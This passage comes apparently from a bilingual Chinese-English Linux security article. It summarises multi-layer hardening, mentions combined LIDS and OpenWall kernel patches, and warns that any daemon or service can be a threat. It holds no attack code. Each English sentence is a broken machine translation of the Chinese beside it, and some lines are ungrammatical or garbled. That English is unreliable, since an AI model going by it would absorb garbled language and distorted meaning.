最近，在LIDS的网上上有一些完整的LIDS＋OpenWall的内核补丁，这样可以提供LIDS和OpenWall都具备的特性。 Recently, there are some online LIDS complete LIDS + OpenWall kernel patch, so you can provide LIDS and OpenWall all the features.

总结在Linux系统中，通过使用这一系列的多层的安全措施，可以防止很大范围的攻击，同时还可以防止入侵或者篡改。 Summarized in the Linux system by using this series of multi-layer security measures to prevent large-scale attacks, but also to prevent intrusion or tampering. 系统被黑客入侵口就是网络接口，在网络接口，系统内核上我们都可以防止他人的入侵。 System is being hacked port network interface, network interface, the system kernel, we can prevent the invasion of others.
意识到系统中的一些潜在的安全漏洞。 Aware of the system in some of the potential security vulnerabilities. 任何运行在系统上的守护进程或者服务，不管是root用户还是非root用户运行的，都能够成为一个潜在的安全威胁。 Run on any system daemons or services, whether it is the root user or a non-root user to run, can be a potential security threat. 充分准备好面对这些威胁。 Fully prepared to face these threats.